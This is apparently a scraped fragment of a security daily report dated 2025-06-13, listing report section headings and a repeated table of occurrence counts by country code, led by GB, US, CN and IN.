22	4	TH
23	4	TM
24	4	AO
25	3	ES
26	3	ZA
27	3	RU
28	3	KZ
29	2	UA
30	2	NG
31	2	KR
32	2	IR
33	2	VN
34	2	IE
35	1	PK
36	1	ID
37	1	GE
38	1	FI

	number_of_occurence	country_iso_code
0	888	GB
1	281	US
2	108	CN
3	103	IN
4	95	JP
5	79	HK
6	75	NL
7	48	BG
8	45	TW
9	35	LT
10	33	DE
11	24	PL
12	14	SG
13	13	CA
14	13	AU
15	12	BA
16	12	SC
17	8	FR
18	8	PT
19	8	GH
20	8	BE
21	6	IL
22	4	TH
23	4	TM
24	4	AO
25	3	ES
26	3	ZA
27	3	RU
28	3	KZ
29	2	UA
30	2	NG
31	2	KR
32	2	IR
33	2	VN
34	2	IE
35	1	PK
36	1	ID
37	1	GE
38	1	FI

Daily Report: 2025-06-13#

Executive summary#

executive_summary#

ot_simplified_report#

botnet_dropper_behaviour#

request#

country_iso_code#

Related

Daily Report: 2025-06-13
#

Executive summary
#

executive_summary
#

ot_simplified_report
#

botnet_dropper_behaviour
#

request
#

country_iso_code
#

	number_of_occurence	country_iso_code
0	888	GB
1	281	US
2	108	CN
3	103	IN
4	95	JP
5	79	HK
6	75	NL
7	48	BG
8	45	TW
9	35	LT
10	33	DE
11	24	PL
12	14	SG
13	13	CA
14	13	AU
15	12	BA
16	12	SC
17	8	FR
18	8	PT
19	8	GH
20	8	BE
21	6	IL
22	4	TH
23	4	TM
24	4	AO
25	3	ES
26	3	ZA
27	3	RU
28	3	KZ
29	2	UA
30	2	NG
31	2	KR
32	2	IR
33	2	VN
34	2	IE
35	1	PK
36	1	ID
37	1	GE
38	1	FI